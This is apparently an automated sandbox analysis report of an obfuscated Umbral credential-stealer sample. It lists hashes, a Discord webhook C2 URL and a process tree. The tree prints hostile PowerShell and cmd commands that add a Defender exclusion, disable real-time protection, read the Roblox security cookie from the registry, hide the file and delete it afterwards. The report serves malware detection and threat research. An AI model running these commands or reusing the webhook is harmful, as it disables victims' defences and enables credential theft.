Analysis

  • max time kernel
    138s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231023-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-11-2023 03:19

General

  • Target

    ConsoleApplication1.obf.exe

  • Size

    424KB

  • MD5

    9764ad0ba2c14105efa6cb7462beda58

  • SHA1

    40c717e44479d0460a2b1789dbaf61a648b038a9

  • SHA256

    52770ec8f2e84b3e264870a7533286670e61bff2c8932f0cd6cc1f60af3323ae

  • SHA512

    d5a5313f377d17a21ec485b6e8ef6ccc02864b4cda1e8c4d47c790a60e3f0430a8fdf482fcfe116b52fb063f298abd594ff9167c68ffda23f0c69fb84d299309

  • SSDEEP

    6144:hY2cJFqVZloZM9rIkd8g+EtXHkv/iD4ZZACl98e1mbiB8BOaedF6IxI:OpJFqVroZOL+EP8h7nuMawF6

Score
10/10

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1170536634891128902/hdNxkvpSxRXfW2ouud2imDE8eFbcAfoi3fBBxpcoRyxI8E-rxHT7NHLuI-Q-ThYq7M3H

Signatures

  • Detect Umbral payload 3 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1.obf.exe
    "C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1.obf.exe"
    1⤵
    • Drops file in System32 directory
    • Suspicious use of WriteProcessMemory
    PID:3096
    • C:\Windows\System32\Speech\5ZTQh4wkLLEAEmHun9jksi5UjDCx9RXL.exe
      C:\Windows\System32\Speech\5ZTQh4wkLLEAEmHun9jksi5UjDCx9RXL.exe
      2⤵
      • Executes dropped EXE
      PID:2732
    • C:\Windows\System32\Speech\EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe
      C:\Windows\System32\Speech\EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1164
      • C:\Windows\SYSTEM32\attrib.exe
        "attrib.exe" +h +s "C:\Windows\System32\Speech\EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe"
        3⤵
        • Drops file in System32 directory
        • Views/modifies file attributes
        PID:4576
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Windows\System32\Speech\EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4108
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4208
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2432
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4324
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:524
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1452
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
          PID:2144
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:2796
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          3⤵
          • Detects videocard installed
          PID:3476
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd.exe" /c ping localhost && del /F /A h "C:\Windows\System32\Speech\EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe" && pause
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4444
          • C:\Windows\system32\PING.EXE
            ping localhost
            4⤵
            • Runs ping.exe
            PID:4232

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      34563f7b2b0a574673544f9feab79c4d

      SHA1

      398679c5f01211593e396929552689a081e05ac2

      SHA256

      af6b203e2923d35d9f583de8abe464b053f6ab32f5b91395eef32ac017de48f6

      SHA512

      0f72fdcc99045e70a49dd8d2e2ee8b881a411cae08857d505218d0c81c6a2e2dd30bda3c4b6e9b976c129301496edaea93b30a565d8ee7c0da434a92a2bd84f5

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      59d97011e091004eaffb9816aa0b9abd

      SHA1

      1602a56b01dd4b7c577ca27d3117e4bcc1aa657b

      SHA256

      18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d

      SHA512

      d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      948B

      MD5

      7249f5c73fd4c203cc0b5d76b5d550e6

      SHA1

      c36c86b0fff962ea5f44d40116554a8e7754a5d4

      SHA256

      fd9b15f7b9f160af704090a1781a61943f27baab50a42c62ac7b6df9f415e17d

      SHA512

      71a99f4051daa50099f26212d22920d38bde6ab1ee0f4f5a2a7dee312c49bb885e193fff1d218cb4f0980277b7b62d9801bf8cd7d356e5870e942989c920f346

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      7164c3d7c57ebbaec233482f2e1cc1f1

      SHA1

      a767f48a2a10c216470d0782100828f0bed91579

      SHA256

      65ca843513f0f6ee03ae9b357fd6fea801a17ffe23c8a04777f8f06a5f0206ae

      SHA512

      bc09ee737727408fa5a969a6eb2be0be83d521e4f3f6c0567e4caa28f09de2794d413fbef52a5a7243fb49005d69ab56052ce417440d07beadbc6684cb362951

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_siujia3w.uwt.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Windows\System32\Speech\5ZTQh4wkLLEAEmHun9jksi5UjDCx9RXL.exe

      Filesize

      11KB

      MD5

      cebf7458dceffcbb81a290cf045beb27

      SHA1

      98c74fa610995d61d2ee78a2ea888e003e9f436d

      SHA256

      97d22321ba783bf6d2119320d38d776bbc6bef42fe3dadecf512e23bbdd29660

      SHA512

      144f0da1e8060e08340f1b349f7bbb17be298ee3d27d056d5603143125b8a9d7abb9485d0f5a2a26e2e50f0d5970ecf5fc3a9e665eece70414c6dc1504b04a91

    • C:\Windows\System32\Speech\EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe

      Filesize

      227KB

      MD5

      ef2711e9aeeb23297016ef32b46a3c7e

      SHA1

      ba51f478c1118d7803620367cb97ce2ceba52a5a

      SHA256

      2fe65b8585389b60e44f688f755bbaefe5a3689737050a96c7586bd9b69a9759

      SHA512

      3c5453a308f0f8321141c2949540f7c3a7c9774eb9e8767210ee30e9745caee0e8bafa8806736f1ec04bd952aa411a5a38a6c97fe19bea3d8d86729571a7059f

    • C:\Windows\System32\Speech\EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe

      Filesize

      227KB

      MD5

      ef2711e9aeeb23297016ef32b46a3c7e

      SHA1

      ba51f478c1118d7803620367cb97ce2ceba52a5a

      SHA256

      2fe65b8585389b60e44f688f755bbaefe5a3689737050a96c7586bd9b69a9759

      SHA512

      3c5453a308f0f8321141c2949540f7c3a7c9774eb9e8767210ee30e9745caee0e8bafa8806736f1ec04bd952aa411a5a38a6c97fe19bea3d8d86729571a7059f

    • memory/1164-44-0x0000026EB6A90000-0x0000026EB6AA0000-memory.dmp

      Filesize

      64KB

    • memory/1164-11-0x0000026EB6A90000-0x0000026EB6AA0000-memory.dmp

      Filesize

      64KB

    • memory/1164-9-0x0000026E9C4A0000-0x0000026E9C4E0000-memory.dmp

      Filesize

      256KB

    • memory/1164-100-0x0000026EB6C60000-0x0000026EB6C72000-memory.dmp

      Filesize

      72KB

    • memory/1164-10-0x00007FFFAA460000-0x00007FFFAAF21000-memory.dmp

      Filesize

      10.8MB

    • memory/1164-53-0x0000026E9E120000-0x0000026E9E13E000-memory.dmp

      Filesize

      120KB

    • memory/1164-122-0x00007FFFAA460000-0x00007FFFAAF21000-memory.dmp

      Filesize

      10.8MB

    • memory/1164-32-0x00007FFFAA460000-0x00007FFFAAF21000-memory.dmp

      Filesize

      10.8MB

    • memory/1164-52-0x0000026EB6CD0000-0x0000026EB6D20000-memory.dmp

      Filesize

      320KB

    • memory/1164-99-0x0000026E9E170000-0x0000026E9E17A000-memory.dmp

      Filesize

      40KB

    • memory/1164-51-0x0000026EB6BE0000-0x0000026EB6C56000-memory.dmp

      Filesize

      472KB

    • memory/2432-54-0x00007FFFAA460000-0x00007FFFAAF21000-memory.dmp

      Filesize

      10.8MB

    • memory/2432-81-0x00007FFFAA460000-0x00007FFFAAF21000-memory.dmp

      Filesize

      10.8MB

    • memory/2432-67-0x000002583DB90000-0x000002583DBA0000-memory.dmp

      Filesize

      64KB

    • memory/2432-56-0x000002583DB90000-0x000002583DBA0000-memory.dmp

      Filesize

      64KB

    • memory/2432-55-0x000002583DB90000-0x000002583DBA0000-memory.dmp

      Filesize

      64KB

    • memory/2796-117-0x00007FFFAA460000-0x00007FFFAAF21000-memory.dmp

      Filesize

      10.8MB

    • memory/2796-105-0x0000029751F80000-0x0000029751F90000-memory.dmp

      Filesize

      64KB

    • memory/2796-104-0x0000029751F80000-0x0000029751F90000-memory.dmp

      Filesize

      64KB

    • memory/2796-103-0x00007FFFAA460000-0x00007FFFAAF21000-memory.dmp

      Filesize

      10.8MB

    • memory/4108-14-0x0000022119400000-0x0000022119410000-memory.dmp

      Filesize

      64KB

    • memory/4108-12-0x00007FFFAA460000-0x00007FFFAAF21000-memory.dmp

      Filesize

      10.8MB

    • memory/4108-13-0x0000022119400000-0x0000022119410000-memory.dmp

      Filesize

      64KB

    • memory/4108-29-0x00007FFFAA460000-0x00007FFFAAF21000-memory.dmp

      Filesize

      10.8MB

    • memory/4108-20-0x0000022119410000-0x0000022119432000-memory.dmp

      Filesize

      136KB

    • memory/4108-26-0x0000022119400000-0x0000022119410000-memory.dmp

      Filesize

      64KB

    • memory/4108-25-0x0000022119400000-0x0000022119410000-memory.dmp

      Filesize

      64KB

    • memory/4208-48-0x00007FFFAA460000-0x00007FFFAAF21000-memory.dmp

      Filesize

      10.8MB

    • memory/4208-46-0x0000016137400000-0x0000016137410000-memory.dmp

      Filesize

      64KB

    • memory/4208-45-0x0000016137400000-0x0000016137410000-memory.dmp

      Filesize

      64KB

    • memory/4208-33-0x0000016137400000-0x0000016137410000-memory.dmp

      Filesize

      64KB

    • memory/4208-31-0x00007FFFAA460000-0x00007FFFAAF21000-memory.dmp

      Filesize

      10.8MB

    • memory/4324-97-0x00007FFFAA460000-0x00007FFFAAF21000-memory.dmp

      Filesize

      10.8MB

    • memory/4324-95-0x00000201DCAA0000-0x00000201DCAB0000-memory.dmp

      Filesize

      64KB

    • memory/4324-84-0x00000201DCAA0000-0x00000201DCAB0000-memory.dmp

      Filesize

      64KB

    • memory/4324-83-0x00000201DCAA0000-0x00000201DCAB0000-memory.dmp

      Filesize

      64KB

    • memory/4324-82-0x00007FFFAA460000-0x00007FFFAAF21000-memory.dmp

      Filesize

      10.8MB